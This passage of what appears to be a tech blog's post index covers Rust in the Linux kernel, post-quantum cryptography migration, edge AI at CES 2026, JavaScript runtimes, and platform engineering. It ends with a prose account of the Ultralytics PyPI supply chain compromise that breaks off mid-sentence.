The network PHY driver abstractions have been another success story, demonstrating that Rust can interface cleanly with existing C subsystems through well-designed safe abstractions.\nThe key technical insight that makes Rust work in the kernel is the concept of safe abstractions over unsafe primitives. The low-level hardware interactions still happen in unsafe blocks — you can\u0026rsquo;t avoid that when talking directly to hardware registers — but the API exposed to driver authors is safe Rust. A driver author working with a well-designed abstraction layer doesn\u0026rsquo;t need to think about use-after-free or data races. The compiler catches those classes of bugs at build time.\nThis matters because driver code is where most kernel bugs live. Studies consistently show that around 70% of kernel vulnerabilities are memory safety issues. If Rust can meaningfully reduce that number in new driver code, the security impact is significant.\nThe Cultural Friction # The technical challenges are solvable. The cultural ones are harder. The kernel community\u0026rsquo;s mailing list has seen heated debates about Rust, ranging from legitimate technical concerns to more fundamental disagreements about the direction of the project.\nSome veteran maintainers have pushed back on the idea that their C subsystems should need to accommodate Rust bindings. The argument isn\u0026rsquo;t unreasonable: maintaining bindings between two languages adds complexity, and the C side shouldn\u0026rsquo;t be constrained by what Rust can or can\u0026rsquo;t express. But the counterargument — that new contributors are increasingly more comfortable with Rust than C, and that memory safety provides measurable security benefits — is equally valid.\nLinus Torvalds has been pragmatic about it, as he tends to be. His position has essentially been: Rust needs to prove itself on its merits, maintainers shouldn\u0026rsquo;t be forced to learn it, and the integration should be gradual. 
That\u0026rsquo;s a reasonable stance, and it\u0026rsquo;s more or less what\u0026rsquo;s happening.\nWhat I\u0026rsquo;m Watching # The most interesting development isn\u0026rsquo;t the technical integration — it\u0026rsquo;s the tooling story. The Rust compiler\u0026rsquo;s target support for kernel builds has improved significantly, but there are still pain points around build system integration, cross-compilation for unusual architectures, and debugging tooling.\nGDB and LLDB support for mixed C/Rust debugging in kernel context is still rough. When you\u0026rsquo;re debugging a kernel panic that crosses the C-Rust boundary, the experience is nowhere near as smooth as pure C debugging with established tools. This is the kind of practical friction that determines whether working kernel developers actually adopt a language, regardless of its theoretical benefits.\nThe alloc crate situation is another area to watch. The kernel can\u0026rsquo;t use Rust\u0026rsquo;s standard allocation mechanisms because kernel memory allocation is fundamentally different — it needs to handle allocation failures gracefully, support different memory types (DMA, MMIO, etc.), and work within specific context constraints. The Rust for Linux project has built custom allocator support, but this means kernel Rust code can\u0026rsquo;t easily reuse libraries from the broader Rust ecosystem. It\u0026rsquo;s a necessary trade-off, but it limits one of Rust\u0026rsquo;s biggest advantages: its package ecosystem.\nThe Broader Implications # What\u0026rsquo;s happening in the Linux kernel is a microcosm of a larger trend. 
Safety-critical systems everywhere are grappling with the same question: can we adopt languages with stronger safety guarantees without abandoning decades of existing code and expertise?\nThe White House\u0026rsquo;s report on memory-safe languages from early 2024 put a policy spotlight on this question, and the ripple effects are reaching into defense contracting, automotive, and medical device software. This represents a broader shift in how the development ecosystem is evolving toward better safety and tooling. Linux\u0026rsquo;s approach — gradual adoption, interoperability with C, safe abstractions over unsafe foundations — is likely the template that other large C codebases will follow. The infrastructure implications are significant as safety in core systems affects how we build on top of them.\nMy Take # I think Rust in the kernel will succeed, but it will take another five years before it\u0026rsquo;s unremarkable. The driver ecosystem is where the impact will be felt first — new hardware drivers written in Rust, old ones maintained in C. This follows the broader pattern of language and tooling evolution where new languages coexist with established ones. The idea that the kernel will ever be fully rewritten in Rust is fantasy, and nobody serious is proposing it.\nWhat I find most valuable isn\u0026rsquo;t the language itself but the conversation it\u0026rsquo;s forcing. Every time a Rust abstraction needs to encode a kernel invariant in the type system, it makes that invariant explicit. Even if you never write a line of Rust, the process of defining safe interfaces improves understanding of the existing C code.\nFor those of us building systems on top of the kernel, the practical impact is still minimal. But if you\u0026rsquo;re writing kernel modules or embedded drivers, learning Rust\u0026rsquo;s ownership model is a worthwhile investment. 
The direction is clear, even if the timeline isn\u0026rsquo;t.\nMore on language and ecosystem evolution in my Developer Landscape series.\n","date":"22 January 2026","externalUrl":null,"permalink":"/posts/260122-rust-linux-kernel-progress/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Rust’s integration into the Linux kernel has moved beyond proof of concept into real subsystems, but the cultural and technical challenges remain fascinating.","title":"Rust in the Linux Kernel — Two Years of Growing Pains and Real Progress","type":"posts"},{"content":" Overview # Security isn\u0026rsquo;t just about incident response—it\u0026rsquo;s about building resilient systems, staying ahead of evolving threats, and integrating security into the development process. This series covers the broader cybersecurity ecosystem: threat trends and attacker sophistication, defensive strategies that work, emerging security tools, and how organizations are shifting from reactive security to proactive risk management.\nWhether you\u0026rsquo;re a developer, architect, or security professional, understanding these trends is essential for building production systems.\nWhat You\u0026rsquo;ll Find Here # Threat Intelligence: Understanding attacker categories (cybercriminals, nation-states, activists), their capabilities, and how they\u0026rsquo;re adapting to defensive innovations.\nDetection \u0026amp; Prevention: Modern security tooling—SIEM, EDR, threat intelligence platforms, and how to detect attacks before they cause damage.\nDefense in Depth: Building security architectures that assume breaches will happen—segmentation, zero trust, incident response preparation, and resilience.\nSecurity Tooling Evolution: How DevSecOps practices, SBOM generation, dependency scanning, and automated testing shift security left into the development pipeline.\nCompliance \u0026amp; Standards: Navigating regulatory requirements, security frameworks, and audit processes 
while maintaining engineering velocity.\nLearning Path # Understand the threat landscape — who attacks what, why, and with what sophistication level Build detection muscle — understand how to spot attacks and what signals matter Architect defensively — principles of defense in depth, zero trust, and incident response planning Integrate security into development — how to make security a development concern, not just a compliance gate Stay current on tools — understand emerging security technologies and when they provide real value Key Topics Covered # Threat Modeling: Attack vectors, threat actors, and risk assessment methodologies Detection Methods: Log analysis, anomaly detection, behavioral analytics, and threat hunting Architectural Patterns: Network segmentation, zero trust, API security, and infrastructure hardening Development Security: Secure code review, dependency management, supply chain security, and secrets management Incident Response: Detection, containment, eradication, recovery, and post-incident analysis Compliance: SOC 2, ISO 27001, PCI DSS, HIPAA, and how to interpret compliance requirements Related Series # Explore complementary areas: Breaches \u0026amp; Zero-Days (analyzing specific incidents and lessons), Supply Chain Security (securing dependencies and build pipelines)\n","date":"15 January 2026","externalUrl":null,"permalink":"/series/cybersecurity-landscape/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Cybersecurity Landscape","type":"series"},{"content":"In August 2024, NIST officially published its first three post-quantum cryptography (PQC) standards: FIPS 203 (ML-KEM), FIPS 204 (ML-DSA), and FIPS 205 (SLH-DSA). What felt like an academic exercise for years is now a concrete engineering challenge. 
If you\u0026rsquo;re running any system that touches TLS, SSH, code signing, or certificate management — which is basically everything — the migration clock is ticking.\nI\u0026rsquo;ve been through enough cryptographic transitions in my career to know how these go. They always start slow and end in a panic. This one has the added complexity of being driven by a threat that doesn\u0026rsquo;t fully exist yet: a cryptographically relevant quantum computer. But the \u0026ldquo;harvest now, decrypt later\u0026rdquo; attack vector makes waiting a genuinely bad strategy.\nWhat Changed in Practice # The finalization of these standards means that vendors can now ship implementations without worrying about algorithm changes. OpenSSL 3.5, released in April 2025, includes ML-KEM support, and several cloud providers already offer PQC key agreement in their TLS implementations. Google has been running hybrid post-quantum key exchange in Chrome since 2024, and the latest data suggests the performance overhead is minimal for most use cases.\nThe real shift, though, is organizational. National Security Memorandum 10 (NSM-10), issued by the White House in May 2022, set a 2035 target for migrating federal systems to quantum-resistant cryptography. That sounds far away until you realize how many systems need to be inventoried, tested, and migrated. For anyone who\u0026rsquo;s dealt with the TLS 1.0/1.1 deprecation — which took the better part of a decade — you know that ten years isn\u0026rsquo;t as long as it sounds.\nThe Inventory Problem # Before you can migrate anything, you need to know what you have. This is where most organizations will stumble. Cryptographic agility — the ability to swap out algorithms without rewriting applications — has been a best practice for years, but in my experience, very few teams have actually implemented it properly.\nThe first step is a cryptographic inventory: every certificate, every key, every hardcoded algorithm reference in your codebase. 
Tools like IBM\u0026rsquo;s Quantum Safe Explorer and open-source projects like Cryptography Bill of Materials (CBOM) are emerging to help with this, but the reality is that most organizations have cryptographic dependencies buried in layers of abstraction they\u0026rsquo;ve never needed to think about.\nI spent some time last week auditing one of our internal services. What should have been a straightforward exercise turned into a rabbit hole of transitive dependencies. A library we use for JWT validation depends on a specific key type that has no post-quantum equivalent yet. Multiply that by every service in a typical microservices architecture, and you start to see the scale of the problem.\nHybrid Approaches and Transition Strategies # The consensus in the security community is that hybrid key exchange — combining a classical algorithm (like X25519) with a post-quantum one (like ML-KEM-768) — is the right transitional approach. This gives you quantum resistance while maintaining a fallback if any issues are discovered in the new algorithms.\nCloudflare published excellent data on their hybrid PQC deployment showing that the additional handshake overhead is roughly 1KB and a few hundred microseconds. For most web applications, that\u0026rsquo;s negligible. But for constrained environments — IoT devices, embedded systems, real-time protocols — the picture is more complicated.\nThe key size increase is the real concern for constrained devices. ML-KEM-768 public keys are 1,184 bytes compared to 32 bytes for X25519. For a device doing thousands of handshakes per second, that memory and bandwidth overhead adds up. This is an area where I expect we\u0026rsquo;ll see significant innovation over the next few years.\nWhat Should You Do Now? # If you\u0026rsquo;re a platform or infrastructure engineer, start with the inventory. You can\u0026rsquo;t plan a migration you can\u0026rsquo;t measure. 
Run your dependency scanners with crypto-aware rules, catalog your certificate infrastructure, and identify your most critical data flows.\nIf you\u0026rsquo;re building new systems, design for cryptographic agility from day one. Abstract your crypto operations behind interfaces that can be swapped without application changes. Use libraries that already support PQC algorithms — BoringSSL, liboqs, and PQClean all have usable implementations.\nIf you\u0026rsquo;re in a regulated industry — finance, healthcare, government — check your compliance frameworks. Several are already being updated to require PQC migration plans, and having a documented strategy will be expected sooner than you think.\nMy Take # I\u0026rsquo;ll be honest: the quantum threat timeline is uncertain, and there\u0026rsquo;s a real risk of premature optimization here. But the cost of starting the inventory and planning now is low compared to the cost of a rushed migration later. The organizations that handled the SHA-1 deprecation and TLS 1.2 migration smoothly were the ones that started early and moved methodically.\nThe worst outcome isn\u0026rsquo;t starting too early — it\u0026rsquo;s discovering in 2030 that your core banking system has hardcoded RSA-2048 in a library that hasn\u0026rsquo;t been maintained since 2019. Start the audit now. 
Future you will be grateful.\nThis is part of my ongoing Security in Practice series, where I dig into the security challenges that actually affect working engineers.\n","date":"15 January 2026","externalUrl":null,"permalink":"/posts/260115-nist-post-quantum-crypto-migration/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"NIST’s post-quantum cryptography standards are finalized, and the migration timeline is no longer theoretical — it’s operational.","title":"Post-Quantum Cryptography — The Migration Clock Is Ticking","type":"posts"},{"content":"CES 2026 kicked off this week in Las Vegas, and while the show floor is always a spectacle of concept gadgets and futuristic prototypes, the real story this year is happening in the less glamorous corners of the convention center — where chip manufacturers, IoT platform vendors, and edge computing companies are quietly reshaping how we think about deploying intelligence.\nThe Edge AI Moment # The dominant theme at CES this year is unmistakable: AI is moving to the edge. After years of cloud-centric AI architectures where every inference required a round trip to a data center, the hardware has finally caught up with the ambition of running sophisticated models locally.\nNVIDIA\u0026rsquo;s announcements around their next-generation embedded platforms continue to push the boundaries of what\u0026rsquo;s possible in power-constrained environments. The ability to run multi-billion parameter models on devices consuming single-digit watts opens up applications that were simply impractical with cloud-dependent architectures.\nQualcomm is making similar moves with their Snapdragon platforms, targeting everything from smartphones to industrial IoT gateways. 
Their pitch is compelling: why send sensitive sensor data to the cloud for processing when you can run inference locally with lower latency, better privacy, and reduced bandwidth costs?\nIntel\u0026rsquo;s continued investment in their edge AI portfolio, particularly around the OpenVINO toolkit, is providing developers with a more vendor-neutral path to edge deployment. The ability to optimize and deploy models across CPUs, GPUs, and dedicated NPUs with a consistent API is exactly the kind of abstraction layer the ecosystem needs.\nWhy This Matters for Developers # If you\u0026rsquo;re building IoT systems or any application that processes data from physical sensors, the shift to edge AI changes your architecture fundamentally. The traditional pattern — collect data at the edge, ship it to the cloud, process it, send results back — is being replaced by a model where the edge device handles the intelligence and only sends relevant insights upstream.\nThis has cascading implications. Network bandwidth requirements drop dramatically when you\u0026rsquo;re sending processed events rather than raw sensor streams. Latency-sensitive applications — industrial automation, autonomous vehicles, real-time quality inspection — become viable in environments with unreliable connectivity. And privacy regulations like GDPR become easier to comply with when personal data never leaves the device.\nFrom a development perspective, the challenge shifts from \u0026ldquo;how do I build a scalable cloud inference pipeline\u0026rdquo; to \u0026ldquo;how do I optimize a model to run within the constraints of an edge device.\u0026rdquo; Model compression techniques — quantization, pruning, knowledge distillation — become essential skills. Frameworks like TensorFlow Lite, ONNX Runtime, and PyTorch Mobile are the tools of the trade.\nI\u0026rsquo;ve been working with edge deployment for several IoT projects over the past year, and the tooling has improved remarkably. 
What used to require deep expertise in model optimization and hardware-specific tuning can now be accomplished with relatively straightforward workflows. The gap between training a model in the cloud and deploying it on an edge device has narrowed considerably.\nThe IoT Platform Evolution # Beyond the AI silicon, CES 2026 is showcasing the maturation of IoT platforms that tie edge devices into coherent systems. AWS IoT Greengrass, Azure IoT Edge, and Google\u0026rsquo;s Cloud IoT offerings have all evolved to support local ML inference as a first-class capability.\nThe Matter protocol continues its slow but steady march toward becoming the universal connectivity standard for smart home devices. After a rocky initial launch, the interoperability improvements in Matter 1.3 and beyond are making it a more practical choice. The promise of buying any Matter-compatible device and having it work with any Matter-compatible platform is gradually becoming reality.\nWhat\u0026rsquo;s more interesting from an industrial perspective is the convergence of OT (operational technology) and IT systems. Edge AI gateways that can speak both industrial protocols (Modbus, OPC UA, MQTT) and cloud APIs are bridging a gap that has frustrated manufacturing and process industries for decades. Being able to deploy a machine learning model for predictive maintenance that reads directly from PLCs and publishes insights to a cloud dashboard — that\u0026rsquo;s genuinely transformative for industries that have been underserved by the software revolution.\nThe Developer Toolkit Gap # Despite the hardware advances, there\u0026rsquo;s still a significant gap in the developer experience for edge AI and IoT. Building, testing, and deploying models to heterogeneous edge devices remains harder than it should be.\nThe simulation and testing story is particularly weak. 
How do you test an edge AI model that\u0026rsquo;s designed to process input from a specific industrial camera in a specific lighting environment? Cloud-based development workflows don\u0026rsquo;t translate well to edge scenarios where hardware-in-the-loop testing is often necessary.\nDevOps practices for edge fleets are also immature compared to cloud-native workflows. Updating models and firmware across thousands of distributed devices with varying connectivity, managing rollbacks when updates fail, and monitoring device health at scale — these are hard problems that don\u0026rsquo;t have standardized solutions yet.\nI expect this developer experience gap to be a major focus of investment over the next couple of years. The hardware is ready, the models are capable, but the developer workflow needs to catch up.\nMy Take # CES always requires a filter — separating the genuinely significant from the merely flashy. This year, the signal is clear: edge AI has crossed the threshold from \u0026ldquo;interesting research\u0026rdquo; to \u0026ldquo;production-ready technology.\u0026rdquo;\nFor those of us who\u0026rsquo;ve been building IoT systems, this is the moment we\u0026rsquo;ve been waiting for. The ability to deploy real intelligence at the edge, without depending on cloud connectivity or accepting the latency penalties of round-trip inference, opens up applications that were previously impractical.\nMy advice: if you\u0026rsquo;re working in IoT or any domain that involves processing physical-world data, start investing in edge AI skills now. Learn model optimization, understand the hardware landscape, and experiment with edge deployment frameworks. The architectural patterns that emerge from this shift will define the next generation of intelligent systems, and the developers who understand both the AI and the edge constraints will be in tremendous demand.\nThe quiet revolution is well underway. 
CES 2026 just made it a little louder.\n","date":"8 January 2026","externalUrl":null,"permalink":"/posts/260108-ces-2026-edge-ai-iot/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CES 2026 opens with edge AI and IoT taking center stage, signaling a shift from cloud-first to edge-first architectures.","title":"CES 2026 — Edge AI and the Quiet Revolution in IoT","type":"posts"},{"content":"","date":"8 January 2026","externalUrl":null,"permalink":"/categories/iot/","section":"Blog Categories: AI, Security, Development \u0026 Infrastructure","summary":"","title":"IoT","type":"categories"},{"content":"Happy New Year. While most sensible people are recovering from last night\u0026rsquo;s celebrations, I\u0026rsquo;m doing what I always do on January 1st — thinking about the year ahead and taking stock of where the tools I rely on daily are heading. And few areas have seen as much productive competition recently as the JavaScript runtime space.\nThe State of Node.js # Node.js remains the backbone of server-side JavaScript, and the project had a strong 2025. Node.js 22 became the active LTS release in October, bringing several features that address long-standing pain points.\nThe built-in test runner, first introduced experimentally in Node 18, has matured considerably. It\u0026rsquo;s not going to replace Jest or Vitest for complex testing scenarios, but for straightforward unit testing without the overhead of a test framework dependency, it\u0026rsquo;s remarkably capable. I\u0026rsquo;ve started using it for utility libraries and internal tools, and the reduction in devDependencies is refreshing.\nThe --experimental-strip-types flag, which allows running TypeScript files directly by stripping type annotations, is perhaps the most significant quality-of-life improvement in recent memory. 
While it doesn\u0026rsquo;t perform type checking (you still need tsc for that), the ability to run .ts files without a compilation step removes friction from the development workflow. For scripts, prototypes, and small services, this is a game-changer. This reflects a broader trend where runtimes are taking on more responsibility for developer experience.\nPermission model improvements continue to bring Node closer to a security-first approach. Being able to restrict file system access, network calls, and child process spawning at the runtime level is something Deno pioneered, and it\u0026rsquo;s encouraging to see Node adopting similar principles.\nDeno 2: Compatibility as Strategy # Deno 2, which launched in October 2024, represented a strategic pivot that\u0026rsquo;s paying dividends. By embracing Node.js and npm compatibility, Ryan Dahl\u0026rsquo;s runtime went from being an idealistic alternative to a practical choice for production workloads.\nThe numbers tell the story: Deno 2 can import npm packages directly, supports package.json, and works with the vast majority of the Node ecosystem without modification. The \u0026ldquo;clean break\u0026rdquo; philosophy of Deno 1 was intellectually appealing but practically limiting. Deno 2 acknowledges that the npm ecosystem is too valuable to ignore.\nFor a deeper look at where Deno is headed, I\u0026rsquo;ve covered Deno 2.3 and the runtime wars in detail, exploring how this compatibility strategy is reshaping the competitive landscape.\nWhat Deno retains from its original vision is equally important. TypeScript remains a first-class citizen — no configuration, no build step, just write TypeScript and run it. The permissions model is still the default, requiring explicit grants for file system, network, and environment access. 
And the built-in toolchain (formatter, linter, test runner, bundler) means you can go from zero to production with no third-party dependencies for your development workflow.\nI\u0026rsquo;ve been running a couple of internal APIs on Deno 2 for the past few months, and the experience has been positive. The cold start times are noticeably better than Node for serverless deployments, and the built-in deno serve with its multi-threaded HTTP server handles concurrent load impressively.\nBun: Speed as a Feature # Bun continues to push the performance envelope. Built on JavaScriptCore rather than V8, Oven\u0026rsquo;s runtime consistently benchmarks faster than both Node and Deno for common operations — package installation, test execution, bundling, and HTTP serving.\nA significant recent development in Bun\u0026rsquo;s evolution is the complete rewrite of its core from Zig to Rust, which demonstrates both the team\u0026rsquo;s commitment to long-term maintainability and how AI-assisted development is reshaping large-scale code modernization efforts.\nBun\u0026rsquo;s approach is maximalist: it\u0026rsquo;s a runtime, package manager, bundler, and test runner all in one binary. The package installation speed alone is enough to make you reconsider your toolchain. Running bun install on a large project and watching it complete in seconds rather than minutes is genuinely delightful.\nThe SQLite driver built into the runtime is a clever move for applications that need local persistence without the overhead of an external database. Combined with Bun\u0026rsquo;s built-in S3 client and HTML rewriter, there\u0026rsquo;s an opinionated but pragmatic approach to common web development needs.\nWhere Bun still faces challenges is ecosystem compatibility. While compatibility has improved dramatically throughout 2025, there are still edge cases where Node.js native modules or complex npm packages don\u0026rsquo;t work correctly. For greenfield projects, this is manageable. 
For migrating existing Node applications, it requires careful testing. Understanding your tooling ecosystem and how different runtimes support tools like linters and formatters is critical for migration planning.\nChoosing the Right Runtime # After working with all three runtimes in production over the past year, here\u0026rsquo;s my practical guidance:\nChoose Node.js when you need maximum ecosystem compatibility, have extensive existing Node infrastructure, or are working in enterprise environments where LTS support and stability are paramount. Node isn\u0026rsquo;t exciting, but it\u0026rsquo;s reliable, and in production, reliable wins. The ecosystem includes mature tooling for monitoring and observability.\nChoose Deno when you\u0026rsquo;re starting a new project, value TypeScript-first development, and want strong security defaults. The developer experience is the most polished of the three, and compatibility with npm packages means you\u0026rsquo;re not sacrificing the ecosystem. For serverless and edge computing, Deno\u0026rsquo;s performance characteristics are particularly advantageous.\nChoose Bun when performance is a primary concern, you\u0026rsquo;re building new services that can work within Bun\u0026rsquo;s compatibility boundaries, or you want the fastest possible development iteration cycle. The speed improvements are real and meaningful, especially for local development and testing workflows.\nMy Take # What I find most encouraging about the current state of JavaScript runtimes is the competitive pressure driving innovation. Node.js is adopting good ideas from Deno (permissions, TypeScript support). Deno is adopting pragmatism from the Node ecosystem (npm compatibility). Bun is pushing everyone on performance.\nThis is how healthy ecosystems evolve. Instead of a single dominant runtime growing complacent, we have three viable options that keep each other honest. 
Features that were experimental luxuries two years ago — native TypeScript support, built-in test runners, permission models — are now table stakes. Similar competitive dynamics are reshaping other language ecosystems as languages like Go and Python continue evolving, and systems programming advances reshape infrastructure development.\nAs someone who wrote their first Node.js application back when it was still a curiosity and callbacks were the only game in town, the sophistication of today\u0026rsquo;s JavaScript runtime ecosystem is remarkable. We\u0026rsquo;ve come from callback hell to a world where you can choose between three production-grade runtimes, each with built-in TypeScript support, modern API designs, and performance that would have seemed impossible a decade ago. This mirrors what we\u0026rsquo;re seeing across the broader developer tools landscape with .NET 9 and the evolution of developer tools ecosystems.\nThe JavaScript runtime story in 2026 is one of abundance. Choose the tool that fits your needs, and know that whichever you pick, you\u0026rsquo;re building on a solid foundation. Innovation across ecosystems ensures that tools will keep getting better.\nCross-Cluster Topics # This development hub connects to other topic clusters:\nAI + Development: GitHub Copilot Agent Mode and AI-assisted testing show how AI is reshaping how developers work Infrastructure + Development: WebAssembly components provide portable, composable application architecture. Systems programming evolution demonstrates how lower-level languages are advancing Security + Development: TanStack npm supply chain compromise and npm security lessons highlight ecosystem vulnerabilities ","date":"1 January 2026","externalUrl":null,"permalink":"/posts/260101-javascript-runtime-landscape-2026/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As we enter 2026, the JavaScript runtime ecosystem is more competitive and innovative than ever. 
Here’s where things stand.","title":"The Node.js Renaissance — Deno 2, Bun, and the Evolving JavaScript Runtime Landscape","type":"posts"},{"content":"It\u0026rsquo;s Christmas Day, the office is quiet, and there\u0026rsquo;s something fitting about using the downtime to reflect on where platform engineering stands as we close out 2025. This has been a transformative year for how organizations think about developer experience, infrastructure abstraction, and the relationship between platform teams and the developers they serve.\nThe Rise of the Internal Developer Platform # If 2024 was the year everyone talked about internal developer platforms (IDPs), 2025 was the year many organizations actually built them. The concept isn\u0026rsquo;t new — giving developers self-service access to infrastructure through curated abstractions has been a goal since the early days of DevOps. But the tooling has finally caught up with the ambition.\nBackstage, Spotify\u0026rsquo;s open-source developer portal, continued its march toward ubiquity. The plugin ecosystem expanded significantly this year, and I\u0026rsquo;ve seen it adopted at organizations ranging from 50-person startups to Fortune 500 enterprises. The value proposition is clear: a single pane of glass for service catalogs, documentation, CI/CD pipelines, and infrastructure provisioning.\nBut Backstage alone isn\u0026rsquo;t a platform — it\u0026rsquo;s a portal. 
The real work happens in the layers beneath: Crossplane for infrastructure-as-code through Kubernetes custom resources, Argo CD for GitOps deployments, and increasingly, purpose-built platform orchestrators like Kratix that handle the promise-based composition of platform capabilities.\nWhat I find encouraging is the shift from \u0026ldquo;let\u0026rsquo;s just give everyone Terraform access\u0026rdquo; to \u0026ldquo;let\u0026rsquo;s provide golden paths that embed our organization\u0026rsquo;s best practices.\u0026rdquo; Platform engineering done well means developers don\u0026rsquo;t need to understand the intricacies of VPC peering or IAM role chaining — they declare what they need, and the platform handles the how. These patterns enable the agent-based system architectures that are emerging.\nKubernetes: Still the Foundation, Less the Focus # Kubernetes itself has become almost invisible in well-run platform teams, and that\u0026rsquo;s exactly where it should be. The conversations this year haven\u0026rsquo;t been about Kubernetes — they\u0026rsquo;ve been about what runs on Kubernetes and how developers interact with it. The 1.32 release cycle demonstrated the platform\u0026rsquo;s continuing maturity, with stability and developer experience improvements as the focus.\nThe managed Kubernetes offerings from AWS (EKS), Google (GKE), and Azure (AKS) have matured to the point where the operational overhead of the control plane is negligible. The remaining complexity lives in networking (service meshes, ingress controllers), observability (the OpenTelemetry ecosystem), and multi-tenancy patterns.\nGateway API reached general availability for its core features and is steadily replacing the aging Ingress resource. If you\u0026rsquo;re still writing Ingress manifests, now is the time to migrate. 
Gateway API\u0026rsquo;s expressiveness and the clear separation between infrastructure provider and application developer roles make it a substantial improvement.\nI\u0026rsquo;ve spent considerable time this year helping teams adopt Cilium for eBPF-based networking, and the results have been impressive. The performance improvements over traditional iptables-based networking are meaningful, and the observability features — being able to see L7 traffic flows without sidecars — have simplified debugging significantly.\nThe Observability Stack Consolidation # One of the most notable trends of 2025 has been the consolidation around OpenTelemetry as the standard instrumentation layer. The project has reached a level of maturity where it\u0026rsquo;s no longer a question of whether to adopt it, but how quickly you can migrate from proprietary agents.\nThe tracing and metrics APIs have been stable for a while, but this year the logging signal reached stability, completing the three pillars under a single standard. For those of us who\u0026rsquo;ve spent years wiring together separate logging, metrics, and tracing pipelines with different agents, formats, and backends, this convergence is a genuine relief.\nOn the backend side, Grafana continued to strengthen its position as the visualization layer of choice, while the LGTM stack (Loki, Grafana, Tempo, Mimir) provides a compelling open-source alternative to commercial observability platforms. I\u0026rsquo;ve migrated two production environments to this stack this year, and the cost savings compared to commercial alternatives were substantial — roughly 60% reduction in observability spend.\nInfrastructure as Code: The Terraform Question # HashiCorp\u0026rsquo;s relicensing of Terraform to BSL in 2023 continues to ripple through the ecosystem. OpenTofu, the community fork, has gained significant traction this year, with several major organizations migrating their workflows. 
The broader supply chain and open-source security landscape has influenced how teams evaluate IaC tools. The OpenTofu 1.8 and 1.9 releases brought features that demonstrated the fork\u0026rsquo;s ability to innovate independently.\nMeanwhile, Pulumi continues to attract developers who prefer writing infrastructure in real programming languages. The appeal is obvious — why learn HCL when you can write TypeScript or Python? But I\u0026rsquo;ve found that the discipline HCL imposes — its declarative nature and limited expressiveness — is actually a feature in larger organizations. Infrastructure code that \u0026ldquo;does too much\u0026rdquo; is infrastructure code that\u0026rsquo;s hard to review and reason about.\nMy current recommendation for teams starting fresh: evaluate OpenTofu as your default, keep an eye on Pulumi for complex orchestration scenarios, and consider Crossplane if you\u0026rsquo;re already deep in the Kubernetes ecosystem. The OpenTofu fork has continued to mature and represents a solid path forward for teams looking to escape HashiCorp\u0026rsquo;s licensing constraints.\nSub-Hub: Platform Engineering \u0026amp; DevOps Practices # For detailed exploration of platform engineering patterns, from internal developer platforms to AI-assisted operations, see Platform Engineering \u0026amp; DevOps Practices — Building Developer Experience Platforms. This sub-hub connects platform engineering disciplines to infrastructure tooling, observability, and the shift toward AI-assisted operations.\nMy Take # Platform engineering in 2025 has moved from buzzword to discipline, and that\u0026rsquo;s the most encouraging development. We have real patterns, real tools, and — crucially — real failure stories to learn from.\nThe teams that have succeeded are those who treated their platform as a product, with developer experience as the primary metric. They invested in golden paths, documentation, and feedback loops. 
They resisted the temptation to build everything custom and instead composed existing open-source tools into coherent platforms. These teams are also investing in observability maturity from day one, recognizing that internal platforms need visibility into their own health and performance.\nThe teams that struggled were those who confused \u0026ldquo;building a platform\u0026rdquo; with \u0026ldquo;adding more YAML.\u0026rdquo; If your developers need a PhD in Kubernetes to deploy a service, your platform has failed, regardless of how elegant its architecture is. Better developer tools and AI-assisted coding continue to improve this experience.\nAs we head into 2026, I expect the focus to shift increasingly toward AI-assisted platform operations — using LLMs to help with incident response, infrastructure optimization, and developer onboarding. Cloud cost optimization and FinOps will become more critical as teams scale their platforms and need better visibility into infrastructure spending.\nLooking further ahead, distributed platform architectures will require platform teams to rethink how they deliver infrastructure abstractions across heterogeneous environments, especially as AI and autonomous systems shape operational models.\nBut that\u0026rsquo;s a topic for another post. For now, enjoy the holiday, and take a moment to appreciate how far our tooling has come. The infrastructure challenges we face today are orders of magnitude more complex than what I dealt with in the early 2000s, but our tools are orders of magnitude better too. The platform engineering discipline itself is evolving as new hardware and capabilities emerge. 
That\u0026rsquo;s progress worth celebrating.\n","date":"25 December 2025","externalUrl":null,"permalink":"/posts/251225-platform-engineering-2025-retrospective/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Reflecting on how platform engineering matured in 2025, from internal developer platforms to the evolution of the DevOps toolchain.","title":"Platform Engineering in 2025 — A Year-End Retrospective","type":"posts"},{"content":"If you needed a year-end reminder of why software supply chain security matters, this week delivered. The Ultralytics Python package — one of the most popular computer vision libraries with millions of monthly downloads — was compromised through a supply chain attack that injected malicious code into versions published to PyPI. This follows the pattern of earlier attacks like PyTorch Lightning malware and TanStack npm compromise that showed how critical infrastructure is vulnerable.\nThe compromised versions contained a cryptominer payload that would execute on installation, quietly consuming compute resources on developers\u0026rsquo; machines and CI/CD servers. The attack was discovered relatively quickly, and the affected versions were yanked from PyPI, but the window of exposure was enough to impact a significant number of users.\nHow It Happened # The attack vector wasn\u0026rsquo;t a direct compromise of the maintainers\u0026rsquo; credentials — it was more insidious. The attackers exploited weaknesses in the build and publish pipeline, specifically targeting the GitHub Actions workflow used to automate package publishing. By manipulating the CI/CD process, they were able to inject code into the package between the source repository and the published artifact on PyPI.\nThis is a pattern we\u0026rsquo;ve seen before, and it\u0026rsquo;s particularly concerning because it bypasses the usual trust model. 
Developers who pinned their dependencies, reviewed the source code on GitHub, and did everything \u0026ldquo;right\u0026rdquo; could still end up with a compromised package. The malicious code existed only in the published distribution, not in the source repository.\nThe gap between source code and distributed artifact is one of the most underappreciated attack surfaces in modern software development. We spend enormous effort on code review, static analysis, and testing, but the pipeline from \u0026ldquo;code in a repository\u0026rdquo; to \u0026ldquo;package on a registry\u0026rdquo; often runs with broad permissions and minimal verification.\nThe Broader Pattern # This isn\u0026rsquo;t an isolated incident. The Python ecosystem has seen a steady stream of supply chain attacks over the past few years. Typosquatting, dependency confusion, and compromised maintainer accounts have all been exploited. The npm ecosystem has faced similar challenges, as documented in npm supply chain security lessons. The fundamental problem is structural: package registries are built on trust, and that trust model doesn\u0026rsquo;t scale. SLSA frameworks and supply chain adoption represent the industry\u0026rsquo;s response to this systemic vulnerability.\nWhat makes the Ultralytics attack noteworthy is the target\u0026rsquo;s legitimacy and popularity. This wasn\u0026rsquo;t a typosquatted package with a similar name — this was the real, widely-used library. When a package with that level of adoption gets compromised, the blast radius is enormous. Every data science team, every computer vision project, every ML pipeline that 